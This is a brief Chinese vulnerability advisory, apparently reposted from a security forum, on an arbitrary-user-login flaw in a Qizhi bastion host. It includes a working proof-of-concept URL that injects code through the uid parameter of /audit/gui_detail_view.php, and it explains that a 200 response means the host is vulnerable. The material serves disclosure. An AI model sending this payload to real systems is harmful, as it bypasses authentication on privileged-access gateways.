漏洞名称齐治堡垒机某版本任意用户登录涉及厂商齐治漏洞等级高危
漏洞名称:齐治堡垒机某版本任意用户登录
涉及厂商:齐治
漏洞等级:高危
是否公开:公开
是否有POC:有
首次发现时间:2021年4月9日
情报来源:互联网
关键路径:
HTTP://x.x.x.x/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
状态码返回200,存在漏洞;“错误ID”提示,不存在漏洞。
以上内容仅供技术分析,请勿用于攻击!
- 本文作者: admin
- 本文来源: 奇安信攻防社区
- 原文链接: https://forum.butian.net/share/78
- 版权声明: 除特别声明外,本文各项权利归原文作者和发表平台所有。转载请注明出处!